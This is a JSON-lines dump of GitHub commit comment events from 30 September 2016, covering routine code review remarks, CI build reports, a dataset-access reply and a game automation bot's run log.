{"id":"4642277890","type":"CommitCommentEvent","actor":{"login":"ikarus23"},"repo":{"name":"ikarus23/MifareClassicTool"},"payload":{"comment":{"id":19238206,"position":null,"line":null,"path":null,"commit_id":"3493e9e1f77a1519836d492a27af1fc9bbd14ff4","created_at":"2016-09-30T09:03:41Z","updated_at":"2016-09-30T09:03:41Z","body":"What do you mean? Is the Galaxy S4 compatible by now? Is that even possible with it's NFC chip?!"}},"created_at":"2016-09-30T09:03:41Z"}
{"id":"4642279956","type":"CommitCommentEvent","actor":{"login":"vuhung"},"repo":{"name":"minhchienwikipedia/react-native"},"payload":{"comment":{"id":19238208,"position":9,"line":9,"path":"Project09/component/heroesView.js","commit_id":"6747e986fc7d40d66473df7afd4c4cb7d18a8cf0","created_at":"2016-09-30T09:04:07Z","updated_at":"2016-09-30T09:04:07Z","body":"Cần comment ở đầu các hàm.\r\n\r\nXem: Define JavaScript coding convention"}},"created_at":"2016-09-30T09:04:07Z"}
{"id":"4642281799","type":"CommitCommentEvent","actor":{"login":"Demonictalent"},"repo":{"name":"Demonictalent/personallyHtml"},"payload":{"comment":{"id":19238210,"position":null,"line":null,"path":null,"commit_id":"b0899eea59f34c0074a183233c55b3d9848ae939","created_at":"2016-09-30T09:04:31Z","updated_at":"2016-09-30T09:04:31Z","body":"这个我第一次使用github，进行管理我的第一次html个人作品，本次作品为一下10个页面。"}},"created_at":"2016-09-30T09:04:31Z"}
{"id":"4642284100","type":"CommitCommentEvent","actor":{"login":"Asif-Hassan"},"repo":{"name":"Asif-Hassan/BRBT-dataset-pickles"},"payload":{"comment":{"id":19238214,"position":null,"line":null,"path":null,"commit_id":"ccad210f4c84645d5fc0d6ee8385a43c12b1836d","created_at":"2016-09-30T09:05:00Z","updated_at":"2016-09-30T09:05:00Z","body":"Dear Mr. Nurul Akter Towhid,\n\nLet me thank you first for you time and interest in our BRBT dataset. The\npolishing and pruning done to the actual dataset (which is a property of\nthe CSE Dept of my university) was a part of my own thesis/project and for\nthat reason we are still not at liberty to publish the dataset itself.\n\nHowever, this should not limit your (or anyone elses) access to the dataset\nto train your own NLP models. The pickled files are there to serve that\npurpose. I would suggest you to kindly go through the readme files to\nunderstand how to use those files for your own causes. In case you need\nhelp with that I would be happy to give further explanation.\n\nThank you once again for your interest in this field and best of luck with\nyour own project/thesis.\n\nRegards,\nAsif Hassan.\n\nOn Sep 30, 2016 02:47, \"Nurul Akter Towhid\" <notifications@github.com>\nwrote:\n\n> Bro !I need this dataset for my Thesis research . Let me know your email\n> or contact .\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Asif-Hassan/BRBT-dataset-pickles/commit/ccad210f4c84645d5fc0d6ee8385a43c12b1836d#commitcomment-19231088>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AS89k0Lif3vmeWw2n8JKKMjcfxS00nfXks5qvCPUgaJpZM4KKdi5>\n> .\n>\n"}},"created_at":"2016-09-30T09:05:00Z"}
{"id":"4642286874","type":"CommitCommentEvent","actor":{"login":"AntumDeluge"},"repo":{"name":"Huluti/debreate"},"payload":{"comment":{"id":19238222,"position":null,"line":null,"path":null,"commit_id":"c82bb1f396a054e74a34234ee6dd787b8c33d054","created_at":"2016-09-30T09:05:35Z","updated_at":"2016-09-30T09:05:35Z","body":"Patched in at [e25409c](https://github.com/AntumDeluge/debreate/commit/e25409c)."}},"created_at":"2016-09-30T09:05:35Z"}
{"id":"4642289419","type":"CommitCommentEvent","actor":{"login":"jjsitsolution"},"repo":{"name":"jjsitsolution/starwarsevents"},"payload":{"comment":{"id":19238231,"position":null,"line":null,"path":null,"commit_id":"a8e4fdcfcf242464ce1a5fd40d80323ff02efa83","created_at":"2016-09-30T09:06:09Z","updated_at":"2016-09-30T09:06:09Z","body":"ok"}},"created_at":"2016-09-30T09:06:09Z"}
{"id":"4642290022","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19238233,"position":null,"line":null,"path":null,"commit_id":"754bb9861cb11f21c026dafe7c28d052707744eb","created_at":"2016-09-30T09:06:15Z","updated_at":"2016-09-30T09:06:15Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1220](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14677&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-30T09:06:15Z"}
{"id":"4642290323","type":"CommitCommentEvent","actor":{"login":"AntumDeluge"},"repo":{"name":"AntumDeluge/debreate"},"payload":{"comment":{"id":19238234,"position":null,"line":null,"path":null,"commit_id":"9e7ee6dfe07576c5c15b90fc1abcaae838bb2b99","created_at":"2016-09-30T09:06:19Z","updated_at":"2016-09-30T09:06:19Z","body":"Patched in at [e25409c](https://github.com/AntumDeluge/debreate/commit/e25409c)."}},"created_at":"2016-09-30T09:06:19Z"}
{"id":"4642290839","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19238238,"position":null,"line":null,"path":null,"commit_id":"83260fec79ca32e8e8ede26c38c818691d3a9f63","created_at":"2016-09-30T09:06:25Z","updated_at":"2016-09-30T09:06:25Z","body":"I think I brought in all the meant code changes from this \"toasted\" branch. Please check them and make sure it's what you wanted:\r\nhttps://github.com/openemr/openemr/commit/dda0de2d02d6b0d84a7e849e70ed2070bf3b921e\r\nhttps://github.com/openemr/openemr/commit/88d608dc41afda643840d9830e2078e8c485d80d\r\nhttps://github.com/openemr/openemr/commit/c8bd99dc14081c371e5d3f64868326e184589ab9\r\nhttps://github.com/openemr/openemr/commit/1777f22b9728c1d0d5d47710c136a9a5a732f7ff\r\nhttps://github.com/openemr/openemr/commit/9c9f23602990b1bae60672b0620bf018ec03ac1b\r\n\r\nthanks, -brady"}},"created_at":"2016-09-30T09:06:25Z"}
{"id":"4642291322","type":"CommitCommentEvent","actor":{"login":"DailyShana"},"repo":{"name":"Fluorohydride/ygopro"},"payload":{"comment":{"id":19238239,"position":null,"line":null,"path":null,"commit_id":"b35329ad91b02a13769f6c15db15f7dc279126db","created_at":"2016-09-30T09:06:31Z","updated_at":"2016-09-30T09:06:31Z","body":"game.cpp 应该用unix行尾(LF)\r\n跨平台的代码都应该用此设置\r\n之前是 be90faf5c3848d433cc65688a03d7b24f99d753e 导致行尾不一致"}},"created_at":"2016-09-30T09:06:31Z"}
{"id":"4642291494","type":"CommitCommentEvent","actor":{"login":"koola"},"repo":{"name":"koola/pix-diff"},"payload":{"comment":{"id":19238240,"position":4,"line":67,"path":"index.js","commit_id":"1f4310ac9bcb496d2a5d48d6056bceb4fe4c55da","created_at":"2016-09-30T09:06:33Z","updated_at":"2016-09-30T09:06:33Z","body":"I got appium on Saucelabs setup as wanted to experiment. Will give more context when things are fully working."}},"created_at":"2016-09-30T09:06:33Z"}
{"id":"4642295362","type":"CommitCommentEvent","actor":{"login":"AntumDeluge"},"repo":{"name":"Huluti/debreate"},"payload":{"comment":{"id":19238243,"position":null,"line":null,"path":null,"commit_id":"792697bb2641d94ee3bf8c0055a95b88cecea689","created_at":"2016-09-30T09:07:18Z","updated_at":"2016-09-30T09:07:18Z","body":"Patched in at [e25409c](https://github.com/AntumDeluge/debreate/commit/e25409c)."}},"created_at":"2016-09-30T09:07:18Z"}
{"id":"4642298047","type":"CommitCommentEvent","actor":{"login":"Naboris"},"repo":{"name":"ZaelChronicles/Ngit"},"payload":{"comment":{"id":19238256,"position":null,"line":null,"path":null,"commit_id":"20470631c061715ad7b330ec9d750b3e3b4fa1b8","created_at":"2016-09-30T09:07:51Z","updated_at":"2016-09-30T09:07:51Z","body":"May be for a futur update"}},"created_at":"2016-09-30T09:07:51Z"}
{"id":"4642298174","type":"CommitCommentEvent","actor":{"login":"AntumDeluge"},"repo":{"name":"Huluti/debreate"},"payload":{"comment":{"id":19238257,"position":null,"line":null,"path":null,"commit_id":"9e7ee6dfe07576c5c15b90fc1abcaae838bb2b99","created_at":"2016-09-30T09:07:53Z","updated_at":"2016-09-30T09:07:53Z","body":"Patched in at [e25409c](https://github.com/AntumDeluge/debreate/commit/e25409c)."}},"created_at":"2016-09-30T09:07:53Z"}
{"id":"4642300877","type":"CommitCommentEvent","actor":{"login":"wswebcreation"},"repo":{"name":"koola/pix-diff"},"payload":{"comment":{"id":19238263,"position":4,"line":67,"path":"index.js","commit_id":"1f4310ac9bcb496d2a5d48d6056bceb4fe4c55da","created_at":"2016-09-30T09:08:29Z","updated_at":"2016-09-30T09:08:29Z","body":"Cool, just first take a saveScreen to see if you get the chromedriver of the full native screenshot. Keep in mind that the Saucelabs implementation can be different then the Appium implementation"}},"created_at":"2016-09-30T09:08:29Z"}
{"id":"4642301296","type":"CommitCommentEvent","actor":{"login":"PallHaraldsson"},"repo":{"name":"JuliaGPU/CUDAdrv.jl"},"payload":{"comment":{"id":19238265,"position":null,"line":null,"path":null,"commit_id":"01913e2febd85b8a2ed8f955a796df39395a6ed0","created_at":"2016-09-30T09:08:35Z","updated_at":"2016-09-30T09:08:35Z","body":"Should this skip the \"-\" ? README says:\r\n\r\nRequirements:\r\n    Julia 0.5+\r\n"}},"created_at":"2016-09-30T09:08:35Z"}
{"id":"4642308890","type":"CommitCommentEvent","actor":{"login":"dattatrayshindeharipur"},"repo":{"name":"dattatrayshindeharipur/AudioAnalytics"},"payload":{"comment":{"id":19238279,"position":null,"line":null,"path":null,"commit_id":"ba32ef99bf283517ed7aba4262159b0150384680","created_at":"2016-09-30T09:10:19Z","updated_at":"2016-09-30T09:10:19Z","body":"initial commit"}},"created_at":"2016-09-30T09:10:19Z"}
{"id":"4642309964","type":"CommitCommentEvent","actor":{"login":"jceel"},"repo":{"name":"freenas/py-cam"},"payload":{"comment":{"id":19238282,"position":14,"line":158,"path":"cam.pyx","commit_id":"264583ce0688972be82c4a60c68ceb0e476988f0","created_at":"2016-09-30T09:10:34Z","updated_at":"2016-09-30T09:10:34Z","body":"Yes, it should, merely because the relevant struct encioc_elm_status field is `unsigned char[4]`. Thanks."}},"created_at":"2016-09-30T09:10:34Z"}
{"id":"4642314816","type":"CommitCommentEvent","actor":{"login":"DarkSon09"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19238285,"position":null,"line":null,"path":null,"commit_id":"40d8547c346cd23ecdce9d537dd456545805c399","created_at":"2016-09-30T09:11:35Z","updated_at":"2016-09-30T09:11:35Z","body":"i tried again, it still occur..\r\nsorry for bad eng.\r\n![image](https://cloud.githubusercontent.com/assets/22286735/18986726/56f0a7f6-8728-11e6-979a-b4cce6945968.png)\r\n[03:47:01 PM]  Scene: Adventure Modes\r\n[03:47:05 PM]  Scene: Map Select\r\n[03:47:08 PM]  Scene: Adventure Ready\r\n[03:47:11 PM]  Scene: Adventure Start\r\n[03:47:14 PM]  Scene: Heroes\r\n[03:47:19 PM]  Scene: Adventure Start\r\n[03:47:22 PM]  Scene: Raid Lobby\r\n[03:47:23 PM]  Scene: Adventure Modes\r\n[03:47:27 PM]  Scene: Map Select\r\n[03:47:30 PM]  Scene: Adventure Ready\r\n[03:47:33 PM]  Scene: Adventure Start\r\n[03:47:36 PM]  Scene: Hero Join\r\n[03:47:37 PM]  Scene: Heroes\r\n[03:47:41 PM]  Scene: Map Select\r\n[03:47:44 PM]  Scene: Adventure Ready\r\n[03:47:47 PM]  Scene: Adventure Start\r\n[03:47:50 PM]  Scene: Hero Join\r\n[03:47:52 PM]  Scene: Heroes\r\n[03:47:54 PM]  Initializing AI...\r\n[03:47:55 PM]  Changing objective to: Adventure\r\n[03:47:57 PM]  Scene: Adventure Start\r\n[03:48:07 PM]  Scene: Adventure Fight\r\n[03:48:08 PM]  @ Wave 1\r\n[03:48:32 PM]  @ Wave 2\r\n[03:48:47 PM]  @ Wave 3\r\n[03:49:17 PM]  Scene: Victory\r\n[03:49:23 PM]  Scene: Adventure Loot\r\n[03:49:39 PM]  Scene: Adventure Start\r\n[03:49:47 PM]  Scene: Adventure Fight\r\n[03:49:48 PM]  @ Wave 1\r\n[03:50:10 PM]  @ Wave 2\r\n[03:50:26 PM]  @ Wave 3\r\n[03:51:04 PM]  Scene: Victory\r\n[03:51:07 PM]  Scene: Adventure Loot\r\n[03:51:23 PM]  Scene: Adventure Start\r\n[03:51:28 PM]  Scene: Adventure Fight\r\n[03:51:31 PM]  @ Wave 1\r\n[03:51:54 PM]  @ Wave 2\r\n[03:52:09 PM]  @ Wave 3\r\n[03:52:34 PM]  Scene: Victory\r\n[03:52:37 PM]  Scene: Adventure Loot\r\n[03:52:53 PM]  Scene: Adventure Start\r\n[03:52:58 PM]  Scene: Adventure Fight\r\n[03:53:01 PM]  @ Wave 1\r\n[03:53:22 PM]  @ Wave 2\r\n[03:53:36 PM]  @ Wave 3\r\n[03:54:03 PM]  Scene: Victory\r\n[03:54:09 PM]  Scene: Adventure Loot\r\n[03:54:26 PM]  Scene: Adventure Start\r\n[03:54:33 PM]  Scene: Adventure Fight\r\n[03:54:35 PM]  @ Wave 1\r\n[03:54:55 PM]  @ Wave 2\r\n[03:55:10 PM]  @ Wave 3\r\n[03:55:37 PM]  Scene: Victory\r\n[03:55:40 PM]  Scene: Adventure Loot\r\n[03:55:56 PM]  Scene: Adventure Start\r\n[03:56:04 PM]  Scene: Adventure Fight\r\n[03:56:05 PM]  @ Wave 1\r\n[03:56:31 PM]  @ Wave 2\r\n[03:56:45 PM]  @ Wave 3\r\n[03:57:09 PM]  Scene: Victory\r\n[03:57:14 PM]  Scene: Adventure Loot\r\n[03:57:30 PM]  Scene: Adventure Start\r\n[03:57:36 PM]  Scene: Adventure Fight\r\n[03:57:39 PM]  @ Wave 1\r\n[03:58:01 PM]  @ Wave 2\r\n[03:58:15 PM]  @ Wave 3\r\n[03:58:37 PM]  Scene: Victory\r\n[03:58:43 PM]  Scene: Adventure Loot\r\n[03:58:59 PM]  Scene: Level 30 Dialog\r\n[03:58:59 PM]  Hero Level 30\r\n[03:58:59 PM]  Changing objective to: Hero Management\r\n[03:59:01 PM]  Scene: Adventure Start\r\n[03:59:05 PM]  Scene: Hero Join\r\n[03:59:06 PM]  Scene: Heroes\r\n[03:59:07 PM]  Start managing heroes\r\n[03:59:08 PM]  Checking each position for level 30...\r\n[03:59:12 PM]  - Got position: 4\r\n[03:59:14 PM]  - Got position: 5\r\n[03:59:17 PM]  Finding heroes...\r\n[03:59:20 PM]  Scene: Hero Join\r\n[03:59:22 PM]  Scene: Heroes\r\n[03:59:23 PM]  Checking each position for level 30...\r\n[03:59:27 PM]  - Got position: 4\r\n[03:59:29 PM]  - Got position: 5\r\n[03:59:32 PM]  Finding heroes...\r\n[03:59:36 PM]  Scene: Hero Join\r\n[03:59:37 PM]  Scene: Heroes\r\n[03:59:38 PM]  Checking each position for level 30...\r\n[03:59:42 PM]  - Got position: 4\r\n[03:59:44 PM]  - Got position: 5\r\n[03:59:48 PM]  Finding heroes...\r\n[03:59:58 PM]  Scene: Hero Join\r\n[04:00:00 PM]  Scene: Heroes\r\n[04:00:00 PM]  Done managing heroes\r\n[04:00:00 PM]  Changing objective to: Adventure\r\n[04:00:06 PM]  Scene: Adventure Start\r\n[04:00:08 PM]  Scene: Lobby\r\n[04:00:27 PM]  Scene: ...\r\n[04:00:27 PM]  cannot find scene escape\r\n[04:00:29 PM]  Scene: Battle Modes\r\n[04:00:31 PM]  Scene: Lobby\r\n[04:00:33 PM]  Scene: Adventure Modes\r\n[04:00:37 PM]  Scene: Map Select\r\n[04:00:40 PM]  Scene: Adventure Ready\r\n[04:00:43 PM]  Scene: Adventure Start\r\n[04:00:46 PM]  Scene: Heroes\r\n[04:00:49 PM]  Scene: Map Select\r\n[04:00:53 PM]  Scene: Adventure Ready\r\n[04:00:56 PM]  Scene: Adventure Start\r\n[04:00:58 PM]  Scene: Hero Join\r\n[04:01:00 PM]  Scene: Heroes\r\n[04:01:03 PM]  Scene: Map Select\r\n[04:01:07 PM]  Scene: Adventure Ready\r\n[04:01:10 PM]  Scene: Adventure Start\r\n[04:01:12 PM]  Scene: Hero Join\r\n[04:01:14 PM]  Scene: Heroes\r\n[04:01:17 PM]  Scene: Map Select\r\n[04:01:21 PM]  Scene: Adventure Ready\r\n[04:01:24 PM]  Scene: Adventure Start\r\n[04:01:26 PM]  Scene: Heroes\r\n[04:01:32 PM]  Scene: Map Select\r\n[04:01:35 PM]  Scene: Adventure Ready\r\n[04:01:38 PM]  Scene: Adventure Start\r\n[04:01:41 PM]  Scene: Hero Join\r\n[04:01:42 PM]  Scene: Heroes\r\n[04:01:46 PM]  Scene: Map Select\r\n[04:01:49 PM]  Scene: Adventure Ready\r\n[04:01:53 PM]  Scene: Adventure Start\r\n[04:01:55 PM]  Scene: Hero Join\r\n[04:01:57 PM]  Scene: Heroes\r\n[04:02:00 PM]  Scene: Map Select\r\n[04:02:04 PM]  Scene: Adventure Ready\r\n[04:02:07 PM]  Scene: Adventure Start\r\n[04:02:09 PM]  Scene: Hero Join\r\n[04:02:11 PM]  Scene: Heroes\r\n[04:02:14 PM]  Scene: Map Select\r\n[04:02:18 PM]  Scene: Adventure Ready\r\n[04:02:21 PM]  Scene: Adventure Start\r\n[04:02:24 PM]  Scene: Hero Join\r\n[04:02:25 PM]  Scene: Heroes\r\n[04:02:29 PM]  Scene: Map Select\r\n[04:02:32 PM]  Scene: Adventure Ready\r\n[04:02:35 PM]  Scene: Adventure Start\r\n[04:02:38 PM]  Scene: Hero Join\r\n[04:02:39 PM]  Scene: Heroes\r\n[04:02:43 PM]  Scene: Map Select\r\n[04:02:46 PM]  Scene: Adventure Ready\r\n[04:02:49 PM]  Scene: Adventure Start\r\n[04:02:52 PM]  Scene: Hero Join\r\n[04:02:54 PM]  Scene: Heroes\r\n\r\n"}},"created_at":"2016-09-30T09:11:35Z"}
{"id":"4642314899","type":"CommitCommentEvent","actor":{"login":"babenek"},"repo":{"name":"babenek/ukraine"},"payload":{"comment":{"id":19238287,"position":null,"line":null,"path":null,"commit_id":"3f7e47a4747efbb6acfcf08ed6082f7bca50d923","created_at":"2016-09-30T09:11:36Z","updated_at":"2016-09-30T09:11:36Z","body":"Неплохо предыдущий патч применился."}},"created_at":"2016-09-30T09:11:36Z"}
{"id":"4642315386","type":"CommitCommentEvent","actor":{"login":"ucasFL"},"repo":{"name":"LCTT/TranslateProject"},"payload":{"comment":{"id":19238289,"position":null,"line":null,"path":null,"commit_id":"586c4d8ebb496445012a6ebe9c294822a1d5337a","created_at":"2016-09-30T09:11:42Z","updated_at":"2016-09-30T09:11:42Z","body":"哈哈，还好吧，这篇主要是涉及一些数学知识。"}},"created_at":"2016-09-30T09:11:42Z"}
{"id":"4642315661","type":"CommitCommentEvent","actor":{"login":"manhninh94"},"repo":{"name":"nguyenhieptn/eictu"},"payload":{"comment":{"id":19238292,"position":null,"line":null,"path":null,"commit_id":"d3d64d6803f6b535a084b1b5a05fa93b0cb720e3","created_at":"2016-09-30T09:11:46Z","updated_at":"2016-09-30T09:11:46Z","body":"back"}},"created_at":"2016-09-30T09:11:46Z"}
{"id":"4642317859","type":"CommitCommentEvent","actor":{"login":"xen0n"},"repo":{"name":"GuaiYiHu/android_device_meizu_arale"},"payload":{"comment":{"id":19238299,"position":null,"line":null,"path":null,"commit_id":"0f089fbc7be3f01456b20bc848b3597ba45c4071","created_at":"2016-09-30T09:12:13Z","updated_at":"2016-09-30T09:12:13Z","body":"@GuaiYiHu No, I don't remember having run into this... I did get some strange errors though, a `repo sync` plus `mka clobber` may luckily be enough to work around them."}},"created_at":"2016-09-30T09:12:13Z"}
{"id":"4642319812","type":"CommitCommentEvent","actor":{"login":"ucasFL"},"repo":{"name":"LCTT/TranslateProject"},"payload":{"comment":{"id":19238305,"position":null,"line":null,"path":null,"commit_id":"586c4d8ebb496445012a6ebe9c294822a1d5337a","created_at":"2016-09-30T09:12:40Z","updated_at":"2016-09-30T09:12:40Z","body":"＠wxy哈哈，还好吧，这篇主要是设计一些数学知识。"}},"created_at":"2016-09-30T09:12:40Z"}
{"id":"4642321909","type":"CommitCommentEvent","actor":{"login":"aeroanakin"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":19238309,"position":13,"line":11,"path":"Vidly/ViewModels/MovieFormViewModel.cs","commit_id":"e5b994581931a079ad87418ddcf9338e808bd821","created_at":"2016-09-30T09:13:08Z","updated_at":"2016-09-30T09:13:08Z","body":"eh.. i kinda confused.. i guess you were missing the property of Movie? \r\n\r\nshould add one line code here? \r\n`public Movie Movie { get; set; }`"}},"created_at":"2016-09-30T09:13:08Z"}
{"id":"4642323482","type":"CommitCommentEvent","actor":{"login":"ucasFL"},"repo":{"name":"LCTT/TranslateProject"},"payload":{"comment":{"id":19238314,"position":null,"line":null,"path":null,"commit_id":"586c4d8ebb496445012a6ebe9c294822a1d5337a","created_at":"2016-09-30T09:13:26Z","updated_at":"2016-09-30T09:13:26Z","body":"@wxy哈哈，还好吧，这篇主要是涉及一些数学知识@oska874 "}},"created_at":"2016-09-30T09:13:26Z"}
{"id":"4642324397","type":"CommitCommentEvent","actor":{"login":"hatifnatt"},"repo":{"name":"hatifnatt/liquidprompt"},"payload":{"comment":{"id":19238316,"position":null,"line":null,"path":null,"commit_id":"a398b4c339c040fcd63e1f9874dc634cdd9f9777","created_at":"2016-09-30T09:13:39Z","updated_at":"2016-09-30T09:13:39Z","body":"I hope now I make it in the right way."}},"created_at":"2016-09-30T09:13:39Z"}
{"id":"4642324543","type":"CommitCommentEvent","actor":{"login":"maZahaca"},"repo":{"name":"findexchange/data-group-service"},"payload":{"comment":{"id":19238317,"position":20,"line":9,"path":"app.py","commit_id":"64fdac297217a4fd1c56b546b55ebfb0dfb572ef","created_at":"2016-09-30T09:13:41Z","updated_at":"2016-09-30T09:13:41Z","body":"the name of the method should be meaningful, for example \"groupByName\""}},"created_at":"2016-09-30T09:13:41Z"}
{"id":"4642332899","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19238327,"position":null,"line":null,"path":null,"commit_id":"3c3dc0caff8512d3d93211ecb83857c7d2603b58","created_at":"2016-09-30T09:15:34Z","updated_at":"2016-09-30T09:15:34Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1791 of 1794 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3c3dc0caff8512d3d93211ecb83857c7d2603b58-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3c3dc0caff8512d3d93211ecb83857c7d2603b58-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.83%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3c3dc0caff8512d3d93211ecb83857c7d2603b58-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.26%25-green.svg)</a>\n"}},"created_at":"2016-09-30T09:15:34Z"}
{"id":"4642335621","type":"CommitCommentEvent","actor":{"login":"nikolai-b"},"repo":{"name":"npct/pct-shiny"},"payload":{"comment":{"id":19238332,"position":8,"line":14,"path":"regions_www/manual_body.html","commit_id":"0eb84ec8d82f51d925da99f83246d01bef331788","created_at":"2016-09-30T09:16:09Z","updated_at":"2016-09-30T09:16:09Z","body":"I'm uncomfortable about linking to a github file in a comment.\r\n\r\nIf we are just linking to static files then can we keep them in the repo and link using\r\n\r\nhttps://cdn.rawgit.com/npct/pct-data/SHA/LOCATION\r\n\r\n(github isn't great at serving files on the web).  Or better we can put our assets on Amazon S3 and link to that, giving others access so anyone can change the manuals without deploying any code.  @RachelAldred have you used Amazon S3?"}},"created_at":"2016-09-30T09:16:09Z"}
{"id":"4642336154","type":"CommitCommentEvent","actor":{"login":"Kogoro"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19238333,"position":12,"line":149,"path":"plugins/de.ovgu.featureide.fm.core/src/de/ovgu/featureide/fm/core/base/impl/FeatureStructure.java","commit_id":"185070c08a3867dcaffab99486c52e001e8cdf51","created_at":"2016-09-30T09:16:16Z","updated_at":"2016-09-30T09:16:16Z","body":"It's a simple action so I don't think we need a comment here"}},"created_at":"2016-09-30T09:16:16Z"}
{"id":"4642337030","type":"CommitCommentEvent","actor":{"login":"maZahaca"},"repo":{"name":"findexchange/data-group-service"},"payload":{"comment":{"id":19238335,"position":20,"line":9,"path":"app.py","commit_id":"64fdac297217a4fd1c56b546b55ebfb0dfb572ef","created_at":"2016-09-30T09:16:27Z","updated_at":"2016-09-30T09:16:27Z","body":"Better to use only \"POST\" here, because we will send to the method big amount of data.\r\nGET has limitation... \r\nHTTP itself doesn't impose any hard-coded limit on request length; but browsers and servers have limits ranging on the 2kb - 8kb"}},"created_at":"2016-09-30T09:16:27Z"}
{"id":"4642337085","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19238336,"position":null,"line":null,"path":null,"commit_id":"3c3dc0caff8512d3d93211ecb83857c7d2603b58","created_at":"2016-09-30T09:16:28Z","updated_at":"2016-09-30T09:16:28Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3c3dc0caff8512d3d93211ecb83857c7d2603b58-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-30T09:16:28Z"}
{"id":"4642339101","type":"CommitCommentEvent","actor":{"login":"afabiani"},"repo":{"name":"geoserver/geoserver"},"payload":{"comment":{"id":19238337,"position":18,"line":67,"path":"src/web/core/src/main/java/org/geoserver/web/data/store/WMSStoreNewPage.java","commit_id":"79fd8dba4ecef792bd0f56ce47da7b8d6dc6b0b0","created_at":"2016-09-30T09:16:55Z","updated_at":"2016-09-30T09:16:55Z","body":"Hi Torben, the logic is right, we must save the \"savedStore\". The \"expandedStore\" is useful only to test the connection parameters. The idea is: I have variables among the connectionParams and I want to store those variables. At the same time I need to validate the store before saving it. At this point I expand the variables, test the store and then I save the original one.\r\n\r\nThe exception may depend from an issue on the clone method, and this is what we have to understand exactly. I'm going to do more tests on this direction."}},"created_at":"2016-09-30T09:16:55Z"}
{"id":"4642340469","type":"CommitCommentEvent","actor":{"login":"maZahaca"},"repo":{"name":"findexchange/data-group-service"},"payload":{"comment":{"id":19238340,"position":28,"line":16,"path":"app.py","commit_id":"64fdac297217a4fd1c56b546b55ebfb0dfb572ef","created_at":"2016-09-30T09:17:14Z","updated_at":"2016-09-30T09:17:14Z","body":"200 response code is better here.\r\n201 means new item created"}},"created_at":"2016-09-30T09:17:14Z"}
{"id":"4642340550","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19238341,"position":null,"line":null,"path":null,"commit_id":"754bb9861cb11f21c026dafe7c28d052707744eb","created_at":"2016-09-30T09:17:15Z","updated_at":"2016-09-30T09:17:15Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1220](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14677&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:10:59"}},"created_at":"2016-09-30T09:17:15Z"}
{"id":"4642341474","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-drag-question"},"payload":{"comment":{"id":19238344,"position":126,"line":1377,"path":"js/dragquestion.js","commit_id":"11609b66118e85776895d9266ca5417695b842af","created_at":"2016-09-30T09:17:28Z","updated_at":"2016-09-30T09:17:28Z","body":"Indeed, 452aa203919f04eaea6879b4d0f76fbe14f1a2e7"}},"created_at":"2016-09-30T09:17:28Z"}
{"id":"4642342103","type":"CommitCommentEvent","actor":{"login":"4u7"},"repo":{"name":"yanex/uast-android-tools-base"},"payload":{"comment":{"id":19238345,"position":43,"line":2114,"path":"lint/libs/lint-checks/src/main/java/com/android/tools/lint/checks/ApiDetector.java","commit_id":"3731f2ff2bbc53b1708660e72aa98b6a9b5603ec","created_at":"2016-09-30T09:17:36Z","updated_at":"2016-09-30T09:17:36Z","body":"fixed"}},"created_at":"2016-09-30T09:17:36Z"}
{"id":"4642342844","type":"CommitCommentEvent","actor":{"login":"4u7"},"repo":{"name":"yanex/uast-android-tools-base"},"payload":{"comment":{"id":19238347,"position":72,"line":2143,"path":"lint/libs/lint-checks/src/main/java/com/android/tools/lint/checks/ApiDetector.java","commit_id":"3731f2ff2bbc53b1708660e72aa98b6a9b5603ec","created_at":"2016-09-30T09:17:46Z","updated_at":"2016-09-30T09:17:46Z","body":"fixed"}},"created_at":"2016-09-30T09:17:46Z"}
